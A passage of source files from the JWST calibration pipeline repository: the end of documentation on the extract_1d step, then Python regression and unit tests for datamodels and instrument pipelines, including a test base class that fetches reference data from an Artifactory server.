mentioned above).\nThe ``extract_1d`` step collapses the input data from 2-D to 1-D by summing\none or more rows (or columns, depending on the dispersion direction).\nA background may optionally be subtracted, but\nthere are also other options for background subtraction prior to ``extract_1d``.\nFor the case of input data in units of MJy / sr, the SURF_BRIGHT\nand BACKGROUND columns are\npopulated by dividing the sum by the number of pixels (see the NPIXELS column,\ndescribed below) that were added together. The FLUX column is populated\nby multiplying the sum by the solid angle of a pixel, and also multiplying\nby 10^6 to convert from MJy to Jy.\nFor the case of input data in units of MJy (i.e. point sources,\nNIRSpec or NIRISS SOSS), the SURF_BRIGHT column is set to zero, the\nFLUX column is just multiplied by 10^6, and the BACKGROUND column is\ndivided by NPIXELS and by the solid angle of a pixel to convert to surface\nbrightness (MJy / sr).\n\nNPIXELS is the number of pixels that were added together for the source\nextraction region. Note that this is not necessarily a constant, and\nthe value is not necessarily an integer (the data type is float).\nBACKGROUND is the measured background, scaled to the extraction width used\nfor FLUX and SURF_BRIGHT. 
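To make the flux and surface-brightness conversions described above concrete,
here is a small numeric sketch for the MJy / sr case; all of the numbers,
including the pixel solid angle, are invented for illustration::

    column_sum = 2.2           # sum over the extraction region, MJy / sr
    npixels = 11.0             # number of pixels added together
    pixel_area = 2.35e-13      # pixel solid angle in steradians (invented)

    surf_bright = column_sum / npixels        # 0.2 MJy / sr
    flux = column_sum * pixel_area * 1.0e6    # Jy (the 1e6 converts MJy to Jy)
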
BACKGROUND will be zero if background subtraction\nis not requested.\nERROR, SB_ERROR, BERROR, and DQ are not populated with useful values yet.\n" }, { "alpha_fraction": 0.5736891031265259, "alphanum_fraction": 0.5765765905380249, "avg_line_length": 29.167247772216797, "blob_id": "808aa96b715e5c9b22fa2f2f9bcca6385c36a673", "content_id": "df34e09e202a6fd813f0c451cc3ad2db4e1307bc", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8658, "license_type": "permissive", "max_line_length": 88, "num_lines": 287, "path": "/jwst/tests/base_classes.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from glob import glob as _sys_glob\nimport os\nfrom os import path as op\nfrom pathlib import Path\nimport sys\nimport pytest\nimport requests\n\nfrom ci_watson.artifactory_helpers import (\n BigdataError,\n check_url,\n get_bigdata,\n get_bigdata_root,\n)\nfrom .compare_outputs import compare_outputs\n\nfrom jwst.associations import load_asn\n\n__all__ = [\n 'BaseJWSTTest',\n]\n\n# Define location of default Artifactory API key, for Jenkins use only\nARTIFACTORY_API_KEY_FILE = '/eng/ssb2/keys/svc_rodata.key'\n\n\[email protected]('_jail')\[email protected]\nclass BaseJWSTTest:\n '''\n Base test class from which to derive JWST regression tests\n '''\n rtol = 0.00001\n atol = 0\n\n input_loc = '' # root directory for 'input' files\n ref_loc = [] # root path for 'truth' files: ['test1','truth'] or ['test3']\n\n ignore_table_keywords = []\n ignore_fields = []\n ignore_hdus = ['ASDF']\n ignore_keywords = ['DATE', 'CAL_VER', 'CAL_VCS', 'CRDS_VER', 'CRDS_CTX', 'FILENAME']\n\n @pytest.fixture(autouse=True)\n def config_env(self, pytestconfig, envopt):\n self.env = pytestconfig.getoption('env')\n\n @pytest.fixture(autouse=True)\n def config_access(self, pytestconfig):\n self.inputs_root = pytestconfig.getini('inputs_root')[0]\n self.results_root = pytestconfig.getini('results_root')[0]\n\n @property\n def repo_path(self):\n return [self.inputs_root, self.env, self.input_loc]\n\n def get_data(self, *pathargs, docopy=True):\n \"\"\"\n Download `filename` into working directory using\n `artifactory_helpers/get_bigdata()`.\n This will then return the full path to the local copy of the file.\n \"\"\"\n local_file = get_bigdata(*self.repo_path, *pathargs, docopy=docopy)\n return local_file\n\n def compare_outputs(self, outputs, raise_error=True, **kwargs):\n\n # Parse any user-specified kwargs\n ignore_keywords = kwargs.get('ignore_keywords', self.ignore_keywords)\n ignore_hdus = kwargs.get('ignore_hdus', self.ignore_hdus)\n ignore_fields = kwargs.get('ignore_fields', self.ignore_fields)\n rtol = kwargs.get('rtol', self.rtol)\n atol = kwargs.get('atol', self.atol)\n\n compare_kws = dict(ignore_fields=ignore_fields, ignore_hdus=ignore_hdus,\n ignore_keywords=ignore_keywords,\n rtol=rtol, atol=atol)\n\n input_path = [self.inputs_root, self.env, self.input_loc, *self.ref_loc]\n\n return compare_outputs(outputs,\n input_path=input_path,\n docopy=True,\n results_root=self.results_root,\n **compare_kws)\n\n def data_glob(self, *pathargs, glob='*'):\n \"\"\"Retrieve file list matching glob\n\n Parameters\n ----------\n pathargs: (str[, ...])\n Path components\n\n glob: str\n The file name match criterion\n\n Returns\n -------\n file_paths: [str[, ...]]\n File paths that match the glob criterion.\n Note that the TEST_BIGDATA and `repo_path`\n roots are removed so these results can be fed\n back into `get_data()`\n \"\"\"\n\n # Get full path 
and proceed depending on whether\n # is a local path or URL.\n root = get_bigdata_root()\n if op.exists(root):\n path = op.join(root, *self.repo_path)\n root_len = len(path) + 1\n path = op.join(path, *pathargs)\n file_paths = _data_glob_local(path, glob)\n elif check_url(root):\n root_len = len(op.join(*self.repo_path[1:])) + 1\n path = op.join(*self.repo_path, *pathargs)\n file_paths = _data_glob_url(path, glob, root=root)\n else:\n raise BigdataError('Path cannot be found: {}'.format(path))\n\n # Remove the root from the paths\n file_paths = [\n file_path[root_len:]\n for file_path in file_paths\n ]\n return file_paths\n\n\n# Pytest function to support the parameterization of BaseJWSTTestSteps\ndef pytest_generate_tests(metafunc):\n # called once per each test function\n funcarglist = metafunc.cls.params[metafunc.function.__name__]\n argnames = sorted(funcarglist[0])\n idlist = [funcargs['id'] for funcargs in funcarglist]\n del argnames[argnames.index('id')]\n metafunc.parametrize(argnames, [[funcargs[name] for name in argnames]\n for funcargs in funcarglist], ids=idlist)\n\n\nclass BaseJWSTTestSteps(BaseJWSTTest):\n\n params = {'test_steps':[dict(input=\"\",\n test_dir=None,\n step_class=None,\n step_pars=dict(),\n output_truth=\"\",\n output_hdus=[])\n ]\n }\n\n def test_steps(self, input, test_dir, step_class, step_pars,\n output_truth, output_hdus):\n \"\"\"\n Template method for parameterizing all the tests of JWST pipeline\n processing steps.\n \"\"\"\n\n if test_dir is None:\n return\n\n self.test_dir = test_dir\n self.ref_loc = [self.test_dir, 'truth']\n\n # can be removed once all truth files have been updated\n self.ignore_keywords += ['FILENAME']\n\n input_file = self.get_data(self.test_dir, input)\n result = step_class.call(input_file, save_results=True, **step_pars)\n\n output_file = result.meta.filename\n result.close()\n\n output_pars = None\n if isinstance(output_truth, tuple):\n output_pars = output_truth[1]\n output_truth = output_truth[0]\n\n if not output_pars:\n if output_hdus:\n output_spec = (output_file, output_truth, output_hdus)\n else:\n output_spec = (output_file, output_truth)\n else:\n output_spec = {'files':(output_file, output_truth),\n 'pars':output_pars}\n outputs = [output_spec]\n self.compare_outputs(outputs)\n\n\ndef raw_from_asn(asn_file):\n \"\"\"\n Return a list of all input files from a given association.\n\n Parameters\n ----------\n asn_file : str\n Filename for the ASN file.\n\n Returns\n -------\n members : list of str\n A list of all input files in the association\n\n \"\"\"\n\n members = []\n with open(asn_file) as f:\n asn = load_asn(f)\n\n for product in asn['products']:\n for member in product['members']:\n members.append(member['expname'])\n\n return members\n\n\ndef _data_glob_local(*glob_parts):\n \"\"\"Perform a glob on the local path\n\n Parameters\n ----------\n glob_parts: (path-like,[...])\n List of components that will be built into a single path\n\n Returns\n -------\n file_paths: [str[, ...]]\n Full file paths that match the glob criterion\n \"\"\"\n full_glob = Path().joinpath(*glob_parts)\n return _sys_glob(str(full_glob))\n\n\ndef _data_glob_url(*url_parts, root=None):\n \"\"\"\n Parameters\n ----------\n url: (str[,...])\n List of components that will be used to create a URL path\n\n root: str\n The root server path to the Artifactory server.\n Normally retrieved from `get_bigdata_root`.\n\n Returns\n -------\n url_paths: [str[, ...]]\n Full URLS that match the glob criterion\n \"\"\"\n # Fix root root-ed-ness\n if 
root.endswith('/'):\n root = root[:-1]\n\n # Access\n try:\n envkey = os.environ['API_KEY_FILE']\n except KeyError:\n envkey = ARTIFACTORY_API_KEY_FILE\n\n try:\n with open(envkey) as fp:\n headers = {'X-JFrog-Art-Api': fp.readline().strip()}\n except (PermissionError, FileNotFoundError):\n print(\"Warning: Anonymous Artifactory search requests are limited to \"\n \"1000 results. Use an API key and define API_KEY_FILE environment \"\n \"variable to get full search results.\", file=sys.stderr)\n headers = None\n\n search_url = '/'.join([root, 'api/search/pattern'])\n\n # Join and re-split the url so that every component is identified.\n url = '/'.join([root] + [idx for idx in url_parts])\n all_parts = url.split('/')\n\n # Pick out \"jwst-pipeline\", the repo name\n repo = all_parts[4]\n\n # Format the pattern\n pattern = repo + ':' + '/'.join(all_parts[5:])\n\n # Make the query\n params = {'pattern': pattern}\n with requests.get(search_url, params=params, headers=headers) as r:\n url_paths = r.json()['files']\n\n return url_paths\n" }, { "alpha_fraction": 0.6125592589378357, "alphanum_fraction": 0.6255924105644226, "avg_line_length": 25.375, "blob_id": "2d4ff742931195bac1d407b41791d012669bf1dc", "content_id": "f29bda99c5c6343be43a9259a89b5c5555fa2ad5", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "permissive", "max_line_length": 67, "num_lines": 32, "path": "/jwst/master_background/tests/test_nirspec_corrections.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nUnit tests for master background NIRSpec corrections\n\"\"\"\nimport numpy as np\n\nfrom jwst import datamodels\nfrom ..nirspec_corrections import correct_nrs_ifu_bkg\n\n\ndef test_ifu_pathloss_existence():\n \"\"\"Test the case where the input is missing a pathloss array\"\"\"\n\n input = datamodels.IFUImageModel((10, 10))\n result = correct_nrs_ifu_bkg(input)\n\n assert (result == input)\n\n\ndef test_ifu_correction():\n \"\"\"Test application of IFU corrections\"\"\"\n\n data = np.ones((5, 5))\n pl_ps = 2 * data\n pl_un = data / 2\n input = datamodels.IFUImageModel(data=data,\n pathloss_point=pl_ps,\n pathloss_uniform=pl_un)\n\n corrected = input.data * pl_ps / pl_un\n result = correct_nrs_ifu_bkg(input)\n\n assert np.allclose(corrected, result.data, rtol=1.e-10)\n" }, { "alpha_fraction": 0.4971887469291687, "alphanum_fraction": 0.5165327787399292, "avg_line_length": 30.855010986328125, "blob_id": "054d6607f5b206cf0bc3d9de4307c1e0c4af8d39", "content_id": "45b5074a85b0a31f1b40b791535dc63042baef43", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14940, "license_type": "permissive", "max_line_length": 115, "num_lines": 469, "path": "/jwst/datamodels/tests/test_fits.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport shutil\nimport tempfile\n\nimport pytest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom asdf import schema as mschema\n\nfrom .. 
import DataModel, ImageModel, RampModel\nfrom ..util import open\n\nROOT_DIR = None\nFITS_FILE = None\nTMP_FITS = None\nTMP_FITS2 = None\nTMP_YAML = None\nTMP_JSON = None\nTMP_DIR = None\n\n\ndef setup():\n global ROOT_DIR, FITS_FILE, TMP_DIR, TMP_FITS, TMP_YAML, TMP_JSON, TMP_FITS2\n ROOT_DIR = os.path.join(os.path.dirname(__file__), 'data')\n FITS_FILE = os.path.join(ROOT_DIR, 'test.fits')\n\n TMP_DIR = tempfile.mkdtemp()\n TMP_FITS = os.path.join(TMP_DIR, 'tmp.fits')\n TMP_YAML = os.path.join(TMP_DIR, 'tmp.yaml')\n TMP_JSON = os.path.join(TMP_DIR, 'tmp.json')\n TMP_FITS2 = os.path.join(TMP_DIR, 'tmp2.fits')\n\n\ndef teardown():\n shutil.rmtree(TMP_DIR)\n\ndef records_equal(a, b):\n a = a.item()\n b = b.item()\n a_size = len(a)\n b_size = len(b)\n equal = a_size == b_size\n for i in range(a_size):\n if not equal: break\n equal = a[i] == b[i]\n return equal\n\ndef test_from_new_hdulist():\n with pytest.raises(AttributeError):\n from astropy.io import fits\n hdulist = fits.HDUList()\n with open(hdulist) as dm:\n dm.data\n\n\ndef test_from_new_hdulist2():\n from astropy.io import fits\n hdulist = fits.HDUList()\n data = np.empty((50, 50), dtype=np.float32)\n primary = fits.PrimaryHDU()\n hdulist.append(primary)\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n with open(hdulist) as dm:\n dq = dm.dq\n assert dq is not None\n\n\ndef test_setting_arrays_on_fits():\n from astropy.io import fits\n hdulist = fits.HDUList()\n data = np.empty((50, 50), dtype=np.float32)\n primary = fits.PrimaryHDU()\n hdulist.append(primary)\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n with open(hdulist) as dm:\n dm.data = np.empty((50, 50), dtype=np.float32)\n dm.dq = np.empty((10, 50, 50), dtype=np.uint32)\n\n\ndef delete_array():\n with pytest.raises(AttributeError):\n from astropy.io import fits\n hdulist = fits.HDUList()\n data = np.empty((50, 50))\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n hdulist.append(science)\n with open(hdulist) as dm:\n del dm.data\n assert len(hdulist) == 1\n\n\ndef test_from_fits():\n with RampModel(FITS_FILE) as dm:\n assert dm.meta.instrument.name == 'MIRI'\n assert dm.shape == (5, 35, 40, 32)\n\n\ndef test_from_scratch():\n with ImageModel((50, 50)) as dm:\n data = np.asarray(np.random.rand(50, 50), np.float32)\n dm.data[...] 
= data\n\n dm.meta.instrument.name = 'NIRCAM'\n\n dm.to_fits(TMP_FITS, overwrite=True)\n\n with ImageModel.from_fits(TMP_FITS) as dm2:\n assert dm2.shape == (50, 50)\n assert dm2.meta.instrument.name == 'NIRCAM'\n assert dm2.dq.dtype.name == 'uint32'\n assert np.all(dm2.data == data)\n\n\ndef test_delete():\n with DataModel(FITS_FILE) as dm:\n dm.meta.instrument.name = 'NIRCAM'\n assert dm.meta.instrument.name == 'NIRCAM'\n del dm.meta.instrument.name\n assert dm.meta.instrument.name is None\n\n\n# def test_section():\n# with RampModel((5, 35, 40, 32)) as dm:\n# section = dm.get_section('data')[3:4, 1:3]\n# assert section.shape == (1, 2, 40, 32)\n\n\n# def test_date_obs():\n# with DataModel(FITS_FILE) as dm:\n# assert dm.meta.observation.date.microsecond == 314592\n\n\ndef test_fits_without_sci():\n from astropy.io import fits\n schema = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\n \"type\": \"object\",\n \"properties\": {\n \"coeffs\": {\n 'max_ndim': 1,\n 'fits_hdu': 'COEFFS',\n 'datatype': 'float32'\n }\n }\n }\n ]\n }\n\n fits = fits.HDUList(\n [fits.PrimaryHDU(),\n fits.ImageHDU(name='COEFFS', data=np.array([0.0], np.float32))])\n\n with DataModel(fits, schema=schema) as dm:\n assert_array_equal(dm.coeffs, [0.0])\n\n\ndef _header_to_dict(x):\n return dict((a, b) for (a, b, c) in x)\n\n\ndef test_extra_fits():\n path = os.path.join(ROOT_DIR, \"headers.fits\")\n\n assert os.path.exists(path)\n\n with DataModel(path) as dm:\n assert 'BITPIX' not in _header_to_dict(dm.extra_fits.PRIMARY.header)\n assert _header_to_dict(dm.extra_fits.PRIMARY.header)['SCIYSTRT'] == 705\n dm2 = dm.copy()\n dm2.to_fits(TMP_FITS, overwrite=True)\n\n with DataModel(TMP_FITS) as dm:\n assert 'BITPIX' not in _header_to_dict(dm.extra_fits.PRIMARY.header)\n assert _header_to_dict(dm.extra_fits.PRIMARY.header)['SCIYSTRT'] == 705\n\n\ndef test_hdu_order():\n from astropy.io import fits\n\n with ImageModel(data=np.array([[0.0]]),\n dq=np.array([[0.0]]),\n err=np.array([[0.0]])) as dm:\n dm.save(TMP_FITS)\n\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n assert hdulist[1].header['EXTNAME'] == 'SCI'\n assert hdulist[2].header['EXTNAME'] == 'DQ'\n assert hdulist[3].header['EXTNAME'] == 'ERR'\n\n\ndef test_casting():\n with RampModel(FITS_FILE) as dm:\n sum = np.sum(dm.data)\n dm.data[:] = dm.data + 2\n assert np.sum(dm.data) > sum\n\n\n# def test_comments():\n# with RampModel(FITS_FILE) as dm:\n# assert 'COMMENT' in (x[0] for x in dm._extra_fits.PRIMARY)\n# dm._extra_fits.PRIMARY.COMMENT = ['foobar']\n# assert dm._extra_fits.PRIMARY.COMMENT == ['foobar']\n\n\ndef test_fits_comments():\n with ImageModel() as dm:\n dm.meta.subarray.xstart = 42\n dm.save(TMP_FITS, overwrite=True)\n\n from astropy.io import fits\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n header = hdulist[0].header\n find = ['Subarray parameters']\n found = 0\n\n for card in header.cards:\n if card[1] in find:\n found += 1\n\n assert found == len(find)\n\n\ndef test_metadata_doesnt_override():\n with ImageModel() as dm:\n dm.save(TMP_FITS, overwrite=True)\n\n from astropy.io import fits\n with fits.open(TMP_FITS, mode='update', memmap=False) as hdulist:\n hdulist[0].header['FILTER'] = 'F150W2'\n\n with ImageModel(TMP_FITS) as dm:\n assert dm.meta.instrument.filter == 'F150W2'\n\n\ndef test_table_with_metadata():\n schema = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n 
\"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\"type\": \"object\",\n \"properties\": {\n \"flux_table\": {\n \"title\": \"Photometric flux conversion table\",\n \"fits_hdu\": \"FLUX\",\n \"datatype\":\n [\n {\"name\": \"parameter\", \"datatype\": ['ascii', 7]},\n {\"name\": \"factor\", \"datatype\": \"float64\"},\n {\"name\": \"uncertainty\", \"datatype\": \"float64\"}\n ]\n },\n \"meta\": {\n \"type\": \"object\",\n \"properties\": {\n \"fluxinfo\": {\n \"title\": \"Information about the flux conversion\",\n \"type\": \"object\",\n \"properties\": {\n \"exposure\": {\n \"title\": \"Description of exposure analyzed\",\n \"type\": \"string\",\n \"fits_hdu\": \"FLUX\",\n \"fits_keyword\": \"FLUXEXP\"\n }\n }\n }\n }\n }\n }\n }\n ]\n }\n\n class FluxModel(DataModel):\n def __init__(self, init=None, flux_table=None, **kwargs):\n super(FluxModel, self).__init__(init=init, schema=schema, **kwargs)\n\n if flux_table is not None:\n self.flux_table = flux_table\n\n flux_im = [\n ('F560W', 1.0e-5, 1.0e-7),\n ('F770W', 1.1e-5, 1.6e-7),\n ]\n with FluxModel(flux_table=flux_im) as datamodel:\n datamodel.meta.fluxinfo.exposure = 'Exposure info'\n datamodel.save(TMP_FITS, overwrite=True)\n del datamodel\n\n from astropy.io import fits\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n assert len(hdulist) == 3\n assert isinstance(hdulist[1], fits.BinTableHDU)\n assert hdulist[1].name == 'FLUX'\n assert hdulist[2].name == 'ASDF'\n\n\ndef test_replace_table():\n from astropy.io import fits\n\n schema_narrow = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\n \"type\": \"object\",\n \"properties\": {\n \"data\": {\n \"title\": \"relative sensitivity table\",\n \"fits_hdu\": \"RELSENS\",\n \"datatype\": [\n {\"name\": \"TYPE\", \"datatype\": [\"ascii\", 16]},\n {\"name\": \"T_OFFSET\", \"datatype\": \"float32\"},\n {\"name\": \"DECAY_PEAK\", \"datatype\": \"float32\"},\n {\"name\": \"DECAY_FREQ\", \"datatype\": \"float32\"},\n {\"name\": \"TAU\", \"datatype\": \"float32\"}\n ]\n }\n }\n }\n ]\n }\n\n schema_wide = {\n \"allOf\": [\n mschema.load_schema(\n os.path.join(os.path.dirname(__file__),\n \"../schemas/core.schema.yaml\"),\n resolve_references=True),\n {\n \"type\": \"object\",\n \"properties\": {\n \"data\": {\n \"title\": \"relative sensitivity table\",\n \"fits_hdu\": \"RELSENS\",\n \"datatype\": [\n {\"name\": \"TYPE\", \"datatype\": [\"ascii\", 16]},\n {\"name\": \"T_OFFSET\", \"datatype\": \"float64\"},\n {\"name\": \"DECAY_PEAK\", \"datatype\": \"float64\"},\n {\"name\": \"DECAY_FREQ\", \"datatype\": \"float64\"},\n {\"name\": \"TAU\", \"datatype\": \"float64\"}\n ]\n }\n }\n }\n ]\n }\n\n x = np.array([(\"string\", 1., 2., 3., 4.)],\n dtype=[('TYPE', 'S16'),\n ('T_OFFSET', np.float32),\n ('DECAY_PEAK', np.float32),\n ('DECAY_FREQ', np.float32),\n ('TAU', np.float32)])\n\n m = DataModel(schema=schema_narrow)\n m.data = x\n m.to_fits(TMP_FITS, overwrite=True)\n\n with fits.open(TMP_FITS, memmap=False) as hdulist:\n assert records_equal(x, np.asarray(hdulist[1].data))\n assert hdulist[1].data.dtype[1].str == '>f4'\n assert hdulist[1].header['TFORM2'] == 'E'\n\n with DataModel(TMP_FITS, schema=schema_wide) as m:\n m.to_fits(TMP_FITS2, overwrite=True)\n\n with fits.open(TMP_FITS2, memmap=False) as hdulist:\n assert records_equal(x, np.asarray(hdulist[1].data))\n assert hdulist[1].data.dtype[1].str == '>f8'\n assert hdulist[1].header['TFORM2'] == 'D'\n\n\ndef 
test_table_with_unsigned_int():\n schema = {\n 'title': 'Test data model',\n '$schema': 'http://stsci.edu/schemas/fits-schema/fits-schema',\n 'type': 'object',\n 'properties': {\n 'meta': {\n 'type': 'object',\n 'properties': {}\n },\n 'test_table': {\n 'title': 'Test table',\n 'fits_hdu': 'TESTTABL',\n 'datatype': [\n {'name': 'FLOAT64_COL', 'datatype': 'float64'},\n {'name': 'UINT32_COL', 'datatype': 'uint32'}\n ]\n }\n }\n }\n\n with DataModel(schema=schema) as dm:\n\n float64_info = np.finfo(np.float64)\n float64_arr = np.random.uniform(size=(10,))\n float64_arr[0] = float64_info.min\n float64_arr[-1] = float64_info.max\n\n uint32_info = np.iinfo(np.uint32)\n uint32_arr = np.random.randint(uint32_info.min, uint32_info.max + 1, size=(10,), dtype=np.uint32)\n uint32_arr[0] = uint32_info.min\n uint32_arr[-1] = uint32_info.max\n\n test_table = np.array(list(zip(float64_arr, uint32_arr)), dtype=dm.test_table.dtype)\n\n def assert_table_correct(model):\n for idx, (col_name, col_data) in enumerate([('float64_col', float64_arr), ('uint32_col', uint32_arr)]):\n # The table dtype and field dtype are stored separately, and may not\n # necessarily agree.\n assert np.can_cast(model.test_table.dtype[idx], col_data.dtype, 'equiv')\n assert np.can_cast(model.test_table.field(col_name).dtype, col_data.dtype, 'equiv')\n assert np.array_equal(model.test_table.field(col_name), col_data)\n\n # The datamodel casts our array to FITS_rec on assignment, so here we're\n # checking that the data survived the casting.\n dm.test_table = test_table\n assert_table_correct(dm)\n\n # Confirm that saving the table (and converting the uint32 values to signed int w/TZEROn)\n # doesn't mangle the data.\n dm.save(TMP_FITS)\n assert_table_correct(dm)\n\n # Confirm that the data loads from the file intact (converting the signed ints back to\n # the appropriate uint32 values).\n with DataModel(TMP_FITS, schema=schema) as dm2:\n assert_table_correct(dm2)\n\n\ndef test_metadata_from_fits():\n from astropy.io import fits\n\n mask = np.array([[0, 1], [2, 3]])\n fits.ImageHDU(data=mask, name='DQ').writeto(TMP_FITS, overwrite=True)\n with DataModel(init=TMP_FITS) as dm:\n dm.save(TMP_FITS2)\n\n with fits.open(TMP_FITS2, memmap=False) as hdulist:\n assert hdulist[2].name == 'ASDF'\n\n\n# def test_float_as_int():\n# from astropy.io import fits\n\n# hdulist = fits.HDUList()\n# primary = fits.PrimaryHDU()\n# hdulist.append(primary)\n# hdulist[0].header['SUBSTRT1'] = 42.7\n# hdulist.writeto(TMP_FITS, overwrite=True)\n\n# with DataModel(TMP_FITS) as dm:\n# assert dm.meta.subarray.xstart == 42.7\n" }, { "alpha_fraction": 0.5804020166397095, "alphanum_fraction": 0.6746231317520142, "avg_line_length": 30.84000015258789, "blob_id": "fe491c81d1de54aa5521458d28e8de218ed0a947", "content_id": "4f152dd1de4e470c396fd4c0f463e01bcfce7674", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 796, "license_type": "permissive", "max_line_length": 86, "num_lines": 25, "path": "/jwst/tests_nightly/general/fgs/test_fgs_image2_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_image2 import Image2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'fgs'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_fgs_image2pipeline1(self):\n \"\"\"\n\n Regression test of calwebb_image2 pipeline performed on FGS imaging mode data.\n\n \"\"\"\n 
input_file = self.get_data('test_image2pipeline',\n 'jw86500007001_02101_00001_GUIDER2_rate.fits')\n output_file = 'jw86500007001_02101_00001_GUIDER2_cal.fits'\n\n Image2Pipeline.call(input_file, save_results=True)\n\n outputs = [(output_file, 'jw86500007001_02101_00001_GUIDER2_cal_ref.fits')]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.48168355226516724, "alphanum_fraction": 0.5767731666564941, "avg_line_length": 33.67567443847656, "blob_id": "e0174e46c37a3e2b2821de714ff72fd4bfa44e86", "content_id": "f8fb0fdea2a220fcbb28307cfed8595bc04d8668", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1283, "license_type": "permissive", "max_line_length": 104, "num_lines": 37, "path": "/jwst/tests_nightly/general/miri/test_mirilrs2_slitless.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_spec2pipeline', 'truth']\n\n def test_mirilrs2pipeline1(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on\n MIRI LRS slitless data.\n \"\"\"\n input_file = self.get_data('test_spec2pipeline',\n 'jw80600012001_02101_00003_mirimage_rateints.fits')\n\n collect_pipeline_cfgs()\n args = [ 'calwebb_tso-spec2.cfg',\n input_file,\n ]\n Step.from_cmdline(args)\n\n outputs = [('jw80600012001_02101_00003_mirimage_calints.fits',\n 'jw80600012001_02101_00003_mirimage_calints_ref.fits',\n ['primary', 'sci', 'err', 'dq']\n ),\n ('jw80600012001_02101_00003_mirimage_x1dints.fits',\n 'jw80600012001_02101_00003_mirimage_x1dints_ref.fits',\n ['primary', ('extract1d', 1), ('extract1d', 2), ('extract1d', 3), ('extract1d', 4)]\n )\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5553134083747864, "alphanum_fraction": 0.5952202081680298, "avg_line_length": 37.235633850097656, "blob_id": "67c991d82c4b7b2098b7a9d559947c1b86c782f2", "content_id": "d670711bd345f8f9493fb6e726d65e67740fe312", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13306, "license_type": "permissive", "max_line_length": 92, "num_lines": 348, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\n\nfrom numpy.testing import assert_allclose\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.assign_wcs import AssignWcsStep, nirspec\nfrom jwst.datamodels import ImageModel\nfrom jwst.pipeline import Detector1Pipeline, Spec2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.imprint import ImprintStep\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.master_background import MasterBackgroundStep\nfrom jwst import datamodels\n\n\[email protected]\nclass TestDetector1Pipeline(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n def test_detector1pipeline4(self):\n \"\"\"\n\n Regression test of calwebb_detector1 pipeline performed on NIRSpec data.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84600007001_02101_00001_nrs1_uncal.fits')\n step = Detector1Pipeline()\n step.save_calibrated_ramp = 
True\n step.ipc.skip = True\n step.persistence.skip = True\n step.jump.rejection_threshold = 4.0\n step.ramp_fit.save_opt = False\n step.output_file = 'jw84600007001_02101_00001_nrs1_rate.fits'\n step.run(input_file)\n\n outputs = [('jw84600007001_02101_00001_nrs1_ramp.fits',\n 'jw84600007001_02101_00001_nrs1_ramp_ref.fits'),\n ('jw84600007001_02101_00001_nrs1_rate.fits',\n 'jw84600007001_02101_00001_nrs1_rate_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecImprint(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_imprint', 'truth']\n test_dir = 'test_imprint'\n\n def test_imprint_nirspec(self):\n \"\"\"\n\n Regression test of imprint step performed on NIRSpec MSA data.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00038001001_01101_00001_NRS1_rate.fits')\n model_file = self.get_data(self.test_dir,\n 'NRSMOS-MODEL-21_NRS1_rate.fits')\n\n result = ImprintStep.call(input_file, model_file, name='imprint')\n\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00038001001_01101_00001_NRS1_imprint.fits')]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecRampFit(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 